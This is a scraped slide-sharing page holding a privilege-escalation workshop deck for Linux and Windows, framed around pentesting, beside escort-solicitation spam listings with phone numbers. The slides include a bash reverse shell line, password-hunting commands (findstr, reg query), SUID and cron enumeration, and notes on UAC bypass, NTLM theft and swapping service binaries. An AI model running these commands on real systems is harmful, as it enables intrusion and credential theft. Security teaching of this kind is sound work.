Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Kürzlich hochgeladen (20)

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 

Privilege escalation from 1 to 0 Workshop

  • 1. By : Hossam Mohamed Privilege Escalation From 1 To 0
  • 2. By : Hossam Mohamed Privilege Escalation From 1 To 0 About ME • Hossam Mohamed • Egyptian , 18 Years Old • Working As cyber security analyst @ Boraq-Group • Working in Cyber Security for 2 years :) • PHP, Python Lover • GitHub , Twitter , LinkedIn @wazehell
  • 3. Privilege Escalation From 1 To 0 Understanding Privilege Escalation components Linux Privilege Escalation Windows Privilege Escalation Some Demo's What Will Be Covered ? By : Hossam Mohamed
  • 4. Privilege Escalation From 1 To 0 By : Hossam Mohamed Why I need Privilege Escalation ? • Why Everyone Want to get high ? • Limited Access Or Full Compromised Machine ? • Opportunity to more maintain access • More Control Teg : hacktrick_pef10 For Who
  • 5. Privilege Escalation From 1 To 0 By : Hossam Mohamed Privilege Escalation Types Horizontal Privilege Escalation Vertical Privilege Escalation Horizontal normal user accesses functions or content related for other users Vertical also known as privilege elevation lower privilege user>higher privilege user
  • 6. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user
  • 7. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user System Root Sudo Users - Services Users Adminisrators P Users Users - Services Users
  • 8. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user Windows • Known exploits • vulnerable windows services • misconfigurations Linux • Kernel Exploit • Known Exploits • Exploiting Services • Exploiting Sudo Users • misconfigurations
  • 9. Privilege Escalation From 1 To 0 By : Hossam Mohamed Let's Talk A little bit about Kernel • A kernel is the core component of any operating system • Low level task (disk management , memory management) • Memory management and I/O • Link Between Hardware (I/O) , Apps , CPU and Memory . • Device management through the use of device drivers kernel is responsible !
  • 10. Privilege Escalation From 1 To 0 By : Hossam Mohamed We Don't Need to know too much about kernel at this moment
  • 11. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service
  • 12. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service • VulnerableMachine • Exploit ! • Ability To Move Exploit • Ability To Compile and Run • SUID • Sudo Users • Weak file's Permissions • And many more • We will talk about that a lot
  • 13. Privilege Escalation From 1 To 0 By : Hossam Mohamed start with Linux • Kernel Exploitation • Weak password of high privilegeusers • file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape • VulnerableApp / Service • Weak permissionof Jobs/Task • Sudoer • System Misconfiguration
  • 14. Privilege Escalation From 1 To 0 By : Hossam Mohamed Kernel Exploits • Kernel Exploits • Find Stable One Or die() • MCE (Move – compile – Execute) • Problems with Kernel Expliots • Dirty Cow :)
  • 15. Privilege Escalation From 1 To 0 By : Hossam Mohamed Dirty Cow • October 2016 • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write
  • 16. Privilege Escalation From 1 To 0 By : Hossam Mohamed It's Not A Cow • copy-on-write (COW) ! • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write • Demo
  • 17. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks # Passwords Every where Check users without passwords .. maybe you got more privilege ! Check For credentials Are you sudo ! , check etc/shadow John the Ripper are here Password mining (configs – logs – bash_history) Password Policy Weakness
  • 18. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Understanding /etc/passwd 1 => username ! 2 => password 3 => UID 4 => GID 5 => UserInfo 6 => Home Dir 7 => Shell All passwords in /etc/shadow
  • 19. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Log , History Cat ~/.bash_history | grep –text "ssh" Or whatever you can pass the password via command line Maybe Web cms configs ! Admin notes Keys And many more !
  • 20. Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
  • 21. Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
  • 22. Privilege Escalation From 1 To 0 By : Hossam Mohamed Cron Jobs .. Time Game :) # What is Cron Jobs Cron jobs, if not configured properly can be exploited to get root privilege. # script or binaries in cron jobs to be writable # Is cron.d directory writable # Can we write over the cron file itself. ls -la /etc/cron.d find /etc/cron* -perm - 0002 -type f -exec ls -la {} ; -exec cat {} 2>/dev/null ; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
  • 23. Privilege Escalation From 1 To 0 By : Hossam Mohamed Sudo • Super User Pls Do It ! • Run With Others • Cat /etc/sudoers • What Sudoers Can do 1
  • 24. Privilege Escalation From 1 To 0 By : Hossam Mohamed # File Permissions • Check Files . • Edit And Run :) • More ! R = read => 4 W = write => 2 X = execute =>1
  • 25. Privilege Escalation From 1 To 0 By : Hossam Mohamed # SUID Files Allows you to run programs as another user upon execution Or in other word (with root) Local Exploits or BoF in SUID app will make you run as root SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
  • 26. Privilege Escalation From 1 To 0 By : Hossam Mohamed SUID Files find / -user root - perm -4000 -print 2>/dev/null find / -perm -u=s - type f 2>/dev/null find / -user root - perm -4000 -exec ls - ldb {} ;
  • 27. Privilege Escalation From 1 To 0 By : Hossam Mohamed Environment Variables # Dynamic linker # What's Dynamic linker Dot In PATH !
  • 28. Privilege Escalation From 1 To 0 By : Hossam Mohamed misconfigurations Webserver => Configs => credential's What if we got MySQL credential's Known Services Exploits modern Linux distributions security ps -ef | grep root
  • 29. Privilege Escalation From 1 To 0 By : Hossam Mohamed Exercise
  • 30. Privilege Escalation From 1 To 0 By : Hossam Mohamed Day 2
  • 31. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Access Control Only "NTFS" formatted drive Cacls output • F (full access), M (modify access), RX (read and execute access) • R (read-only access) ,W (write-only access) # • (OI): object inherit, (CI): container inherit • (IO): inherit only, (NP): do not propagate inherit • (I): permissioninherited from parent container
  • 32. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows integrity levels (IL) Untrusted Low Medium High System Protected/Installer Check your user if local admin !!
  • 33. Privilege Escalation From 1 To 0 By : Hossam Mohamed Windows Files Premonitions Overwrite is always big plus Identify writeable files Recently Created Directories default permissions i/cacls utility Accesschk tool Write Read & Execute Read Full
  • 34. Privilege Escalation From 1 To 0 By : Hossam Mohamed From Local Admin To Domain Admin Pass The Hash Hashdump RDP, Add new Domain Admin Have Some Fun IT Admin Box Local Box Domain Box
  • 35. Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM From Web !! Automatic Logon Policy (Win HTTP) https://github.com/blazeinfosec/ssrf-ntlm/ MySQL LOAD DATA INFILE qprocess /server:15.15.45.41 Nltest Outlook CVE-2018-0950
  • 36. Privilege Escalation From 1 To 0 By : Hossam Mohamed Stealing NTLM Outlook CVE-2018-0950
  • 37. Privilege Escalation From 1 To 0 By : Hossam Mohamed User Account Control (UAC) • security feature of Windows isn't ! :) • Not a Security Boundary • prevent unauthorized changes to the operating system (Run App ..etc) • So UAC Is Issue For a pen tester !! UAC Bypass 1. COM Handler Hijack 2. Memory Injection 3. Some Registry Keys like (FodHelper - Eventvwr)
  • 38. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Credentials are everywhere . Configs - Backups Admin notes – Plaintext Passwords Encrypted Credentials Cashed Credentials (ftp – vnc .. Etc) Post/windows/gather/credentials/* grep => findstr c:sysprep.inf c:sysprep c:sysprep.xml c:Unattended.xml
  • 39. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Passwords in registry’s Putty – snmp reg query HKLM /f password /t REG_SZ /s
  • 40. Privilege Escalation From 1 To 0 By : Hossam Mohamed Credentials Have Groups.xml ! dir /s *pass* == *cred* == *vnc* == *.config* findstr /si password *.xml *.ini *.txt Password In Paper !
  • 41. Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information Local Administrators Check net localgroup administrators Domain user listing Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
  • 42. Privilege Escalation From 1 To 0 By : Hossam Mohamed Users Information UserListing Net users Sessions qwinsta
  • 43. Privilege Escalation From 1 To 0 By : Hossam Mohamed Massing patches Kernel Exploits Discovery of Missing Patches wmic qfe get Caption,Description,HotFixID,InstalledOn Or kill AV post/windows/gather/enum_patches
  • 44. Privilege Escalation From 1 To 0 By : Hossam Mohamed Applications Local Exploit Our friend exploit-db Maybe it’s not about Privilege escalation exploits only RCE system privilege!! You maybe have other way ! post/multi/recon/local_exploit_suggester
  • 45. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation As we see , windows privilege escalation exploitation tecnics will start from here ☺ Quick look at exploit db More then 60% of windows privilege escalation exploitation about services! It’s sound like ohh I thin that’s easy Good to have powershell knowledge Let’s get involved!!
  • 46. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify running services. Net config / services under your control Say hello to your new friend “sc” What’s sc ? Sc query /list all of the services on the machine post/windows/gather/enum_services
  • 47. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Let’s start analysis what we got ! Local administrator or services account! Local System - Network Service - Local Service Do you really want to get other limited shell ? Just Get Hash’s and go home to crack and come back Get-ADDefaultDomainPasswordPolicy / I thin you will know how much time it will take to crack it !!
  • 48. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Normal Service Exploitation some checks Services are automatically starting? Services are controlled? Can you overwrite Service binary? Congratulations you own the box Note : “in modern os sometimes, when you replace services binary with metasploit payload you will lose the shell after 1 min that’s bcs the app crash , so make sure that your payload is about simple task ! “ like install backdoor or add user
  • 49. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Want some CVE into your CV ? I will tell you a trick :”) “Unquoted services paths” or trusted paths What’s that ? It’s about space and “ C:Program Filesblabla appstart.exe C:Program*Filesblabla*appstart.exe All of the * are vulnerable points If you failed in A plan , there are other 25 alphabet to try with it :”)
  • 50. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Identify Unquoted services wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:windows” |findstr /i /v “”” Identify services account level !! Check Write access ! Icacls /Service path/ Check control Net config | findstr services name Or if it’s automatically start , check if you can restart the box exploit/windows/local/trusted_service_path
  • 51. Privilege Escalation From 1 To 0 By : Hossam Mohamed Services exploitation Registry Permissions It’s not common “Adminisrators only who have write prem by default “ But ! It’s easy to exploit Services listing in regedit HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservi ces Take look and check if you can change the path ! Good luck! If you are in windows box GUI access is just a option It’s depends on you !
  • 52. Privilege Escalation From 1 To 0 By : Hossam Mohamed Named pipes exploitation What’s Pipes ?! IO ninja Pipeslist check your pipes Metasploit : getsystem Fuzzing demo
  • 53. Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Windowscan dynamicallyload DLLs What if DLL is Missing ? LoadLibrary(“iamalib.dll”) LoadLibrary(“c:program filesiamalib.dll”)
  • 54. Privilege Escalation From 1 To 0 By : Hossam Mohamed DLL Injection Not found ? Windowsattempts to locate the DLL by searching a well-defined set of directories "DLL preloading attack or a binary planting attack" How the searching operate work ? HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl Session ManagerKnownDLLs
  • 55. Privilege Escalation From 1 To 0 By : Hossam Mohamed More Exploits CVE-2018-1038 Total Meltdown Windows 7 & 2008 R2 Some Kernel Exploits Windows 10 https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ Also There are a good book for kernel exploitation "A Guide to Kernel Exploitation: Attacking the Core"
  • 56. Privilege Escalation From 1 To 0 By : Hossam Mohamed AutoRun AutoRuns tool Check Paths Can You Overwrite ? Restart Got SYSTEM Account :")
  • 57. Privilege Escalation From 1 To 0 By : Hossam Mohamed Binary Replacements Check Imported Binary C:WindowsSystem32sethc.exe Registers Check • RunAs • RunOnce • RenameOnReboot • AlwaysInstallElevated • SRP Policy Enumeration
  • 58. Privilege Escalation From 1 To 0 By : Hossam Mohamed Other Checks • Virtual Image Backups / Storage VMDK - VHD / VHDX - OVA - ISO – IMG • Source code of applications running • Default passwords for installed applications • Default configuration file locations What's Stored on Network Shares ? Task manager
  • 59. Privilege Escalation From 1 To 0 By : Hossam Mohamed I Think This the end :") Nice To Meet You All !! @wazehell
  • 60. Privilege Escalation From 1 To 0 By : Hossam Mohamed